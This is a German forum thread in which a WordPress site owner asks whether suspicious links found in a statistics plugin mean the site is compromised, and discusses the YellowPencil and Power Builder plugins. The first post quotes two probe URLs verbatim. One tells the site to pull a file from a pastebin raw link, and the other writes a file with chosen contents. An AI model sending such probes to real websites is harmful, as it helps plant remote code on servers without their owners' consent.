WP-Installation von Schadware befallen?

Guten Abend!

Habe seit ca. 2 Jahren eine WP Installation laufen, bisher hat auch alles top funktioniert, bis auf dass mal der Name und die Adresse der Website durch nen Bug im Plugin "YellowPencil" geändert wurden. Das Problem konnte ich damals aber schnell beheben. (https://wordpress.org/support/topic/webpage-hacked-report-yellowpencil/)

Nun ist mir aber in meinem Statistik-Plugin aufgefallen das viele offensichtlich unseriöse bzw. zwielichtige Websites vorallem mit russischer TLD auf 2 Links

meinedomain.tld/?xxxxxxxxxxxx_loads=1&xxxxxxxxxxxx_filename=info.txt&xxxxxxxxxxxx_filecontent=INF0
meinedomain.tld//?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos

verweisen.

Wenn ich die Links aufrufe gelange ich einfach nur auf die Startseite.

Handelt es sich hierbei um eine Weiterleitung auf eine Datei o.ä. ?


Da ich überall Strenge Passwörter verwende und alle meine Plugins aktuell halte kann ich mir nicht vorstellen das es sich hierbei um irgend eine Form von Schadware handelt.


Hat einer von euch eine Idee was da los sein könnte? Könnte das evtl. noch mit dem "YellowPencil Hack" zusammenhängen ?

Und hätte jemand evtl. ne Empfehlung für ein Taugliches Anti-Virus für Wordpress?

Unten findet ihr noch eine Übersicht über meine verwendeten Plugins.

Danke im Voraus und schöne Grüße!

 

Hi Pascal,

danke für die Schnelle Antwort!

Auf'm ftp unter wp-content/plugins liegen nur die 10 Ordner der 10 Plugins die ich auch Installiert habe.

Schneit also alles in Ordnung zu sein.

Jo, hatte bisher auch keine weiteren Probleme außer halt die Sache mit YellowPencil. Schau mir die 2 Plugins aber trotzdem mal an!

Danke nochmal und Gruß

 

Power Builder ist ein Pagebuilder von Templatemonster und war beim Theme dabei. Da gabs seit der Installation meines Wissens nach kein Updatet, zumindest habe ich bei Templatemonster keins gefunden.

YellowPencil ist auf der aktuellsten version (7.2.8).

Jo, danke für den Hinweis.